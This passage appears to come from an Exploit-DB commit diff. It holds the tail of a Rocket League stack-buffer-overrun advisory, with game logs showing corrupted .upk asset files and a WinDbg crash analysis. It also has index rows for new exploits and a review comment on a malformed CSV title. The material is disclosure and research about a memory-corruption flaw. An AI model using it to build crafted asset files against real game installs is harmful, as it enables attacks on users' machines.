+[0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' +[0188.65] Warning: Warning, Detected data corruption [incorrect uncompressed size] calculated 1094795585 bytes, requested 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. +[0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' +[0188.66] DevBeacon: FWebSocket::ReadCloseReason this=000002B686633200 received opcode CLOSE. Code=1000 Reason=IdleTimeout +[0188.66] DevOnline: EOSSDK-LogEOS: Large tick time detected 22.5409 + + + +hat_peanut_SF.upk: +------------------ +... +... +0:077> g +(3568.230c): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +VCRUNTIME140!memcmp+0xee: +00007ffe`afc812de f3a4 rep movs byte ptr [rdi],byte ptr [rsi] +0:000> r +rax=0000009852afeaf8 rbx=000001a1cc362268 rcx=ffffffff9c71eae4 +rdx=0000010951ea4107 rsi=000001a1a49a4107 rdi=0000009852b00000 +rip=00007ffeafc812de rsp=0000009852afe9c8 rbp=ffffffff9c71ffec + r8=ffffffff9c71ffec r9=00000000000000ff r10=000001a1a49a2bff +r11=0000009852afeaf8 r12=0000000000000000 r13=0000000000000000 +r14=0000009852afeaf8 r15=0000000000000000 +iopl=0 nv up ei pl nz na pe nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 +VCRUNTIME140!memcmp+0xee: +00007ffe`afc812de f3a4 rep movs byte ptr [rdi],byte ptr [rsi] +0:000> g +(3568.230c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) 
+Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE +RocketLeague!AK::MemoryMgr::GetPoolName+0x84164: +00007ff6`4a660424 cd29 int 29h +0:000> .exr -1 +ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164) + ExceptionCode: c0000409 (Security check failure or stack buffer overrun) + ExceptionFlags: 00000001 +NumberParameters: 1 + Parameter[0]: 0000000000000002 +Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE +0:000> u 00007ff64a660424 +RocketLeague!AK::MemoryMgr::GetPoolName+0x84164: +00007ff6`4a660424 cd29 int 29h +00007ff6`4a660426 488d0d3303f600 lea rcx,[RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d678 (00007ff6`4b5c0760)] +00007ff6`4a66042d e8ca010000 call RocketLeague!AK::MemoryMgr::GetPoolName+0x8433c (00007ff6`4a6605fc) +00007ff6`4a660432 488b442438 mov rax,qword ptr [rsp+38h] +00007ff6`4a660437 4889051a04f600 mov qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d770 (00007ff6`4b5c0858)],rax +00007ff6`4a66043e 488d442438 lea rax,[rsp+38h] +00007ff6`4a660443 4883c008 add rax,8 +00007ff6`4a660447 488905aa03f600 mov qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d710 (00007ff6`4b5c07f8)],rax +0:000> kb 10 + # RetAddr : Args to Child : Call Site +00 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164 +01 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f +02 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf +03 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244 +04 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e +05 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 
00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe [d:\agent\_work\1\s\src\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 114] +06 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b +07 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8 +08 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5 +09 efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 +0a fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e +0b efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 +0c fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e +0d efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 +0e fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e +0f efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 +0:000> !analyze -m +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +KEY_VALUES_STRING: 1 + + Key : Analysis.CPU.mSec + Value: 5640 + + Key : Analysis.DebugAnalysisManager + Value: Create + + Key : Analysis.Elapsed.mSec + Value: 6467 + + Key : Analysis.Init.CPU.mSec + Value: 400749 + + Key : Analysis.Init.Elapsed.mSec + Value: 1699165 + + Key : Analysis.Memory.CommitPeak.Mb + Value: 261 + + Key : FailFast.Name + Value: 
STACK_COOKIE_CHECK_FAILURE
+
+ Key : FailFast.Type
+ Value: 2
+
+ Key : Timeline.OS.Boot.DeltaSec
+ Value: 215108
+
+ Key : Timeline.Process.Start.DeltaSec
+ Value: 1744
+
+ Key : WER.OS.Branch
+ Value: vb_release
+
+ Key : WER.OS.Timestamp
+ Value: 2019-12-06T14:06:00Z
+
+ Key : WER.OS.Version
+ Value: 10.0.19041.1
+
+ Key : WER.Process.Version
+ Value: 1.0.10897.0
+
+
+NTGLOBALFLAG: 0
+PROCESS_BAM_CURRENT_THROTTLED: 0
+PROCESS_BAM_PREVIOUS_THROTTLED: 0
+APPLICATION_VERIFIER_FLAGS: 0
+
+EXCEPTION_RECORD: (.exr -1)
+ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164)
+ ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
+ ExceptionFlags: 00000001
+NumberParameters: 1
+ Parameter[0]: 0000000000000002
+Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
+
+FAULTING_THREAD: 0000230c
+PROCESS_NAME: RocketLeague.exe
+ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
+EXCEPTION_CODE_STR: c0000409
+EXCEPTION_PARAMETER1: 0000000000000002
+
+STACK_TEXT:
+00000098`52afda90 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164
+00000098`52afdad0 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f
+00000098`52afdb00 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf
+00000098`52afdb30 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244
+00000098`52afe240 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e
+00000098`52afe9c8 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe
+00000098`52afe9e0 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b
+00000098`52afea20 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8
+00000098`52afeab0 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5
+...
+...
+
+STACK_COMMAND: ~0s ; .cxr ; kb
+SYMBOL_NAME: RocketLeague!AK::MemoryMgr::GetPoolName+84164
+MODULE_NAME: RocketLeague
+IMAGE_NAME: RocketLeague.exe
+FAILURE_BUCKET_ID: FAIL_FAST_STACK_BUFFER_OVERRUN_STACK_COOKIE_CHECK_FAILURE_MISSING_GSFRAME_c0000409_RocketLeague.exe!AK::MemoryMgr::GetPoolName
+OS_VERSION: 10.0.19041.1
+BUILDLAB_STR: vb_release
+OSPLATFORM_TYPE: x64
+OSNAME: Windows 10
+IMAGE_VERSION: 1.0.10897.0
+FAILURE_ID_HASH: {3e6f3f5b-25bb-68b3-2a5b-232743df7884}
+Followup: MachineOwner
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 99bf55fb5..69baa14a2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6780,6 +6780,7 @@ id,file,description,date,author,type,platform,port
 49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple,
 49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",2021-04-21,"Dolev Farhi",dos,multiple,
 49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,
+49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",2021-05-07,"Erick Galindo",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11315,6 +11316,10 @@ id,file,description,date,author,type,platform,port
 49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
 49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",2021-04-05,"George Tsimpidas",local,windows,
 49765,exploits/linux/local/49765.txt,"MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution",2021-04-14,"Central InfoSec",local,linux,
+49841,exploits/windows/local/49841.txt,"Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation",2021-05-07,LiquidWorm,local,windows,
+49842,exploits/windows/local/49842.txt,"Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path",2021-05-07,"Erick Galindo",local,windows,
+49845,exploits/windows/local/49845.txt,"WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path",2021-05-07,"Erick Galindo",local,windows,
+49848,exploits/windows/local/49848.txt,"Epic Games Rocket League 1.95 - Stack Buffer Overrun",2021-05-07,LiquidWorm,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44003,7 +44008,11 @@ id,file,description,date,author,type,platform,port
 49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
 49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
 49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
-49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Enes Özeser",webapps,multiple,
+49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Emircan Baş",webapps,multiple,
 49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple,
 49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",2021-05-06,h4shur,webapps,php,
 49840,exploits/php/webapps/49840.py,"b2evolution 7-2-2 - 'cf_name' SQL Injection",2021-05-06,nu11secur1ty,webapps,php,
+49843,exploits/php/webapps/49843.txt,"Voting System 1.0 - Authentication Bypass (SQLI)",2021-05-07,secure77,webapps,php,
+49846,exploits/php/webapps/49846.txt,"Voting System 1.0 - Remote Code Execution (Unauthenticated)",2021-05-07,secure77,webapps,php,
+49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,
+49849,exploits/php/webapps/49849.txt,"PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021",2021-05-07,"Tyler Butler",webapps,php,
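Review bot: The description field of the new 49849 row ends with the stray text `# Date: May 3rd 2021`, which does not belong to the title; it should read `"PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection"`. No other row added or changed in this hunk carries header text in that column, so the entry will not match the naming pattern that searches and de-duplication over the description rely on. The suffix looks like an `# Exploit Title:` header line in exploits/php/webapps/49849.txt that runs into the following `# Date:` line without a line break, presumably picked up when the index was generated — worth checking that file's header before regenerating the row.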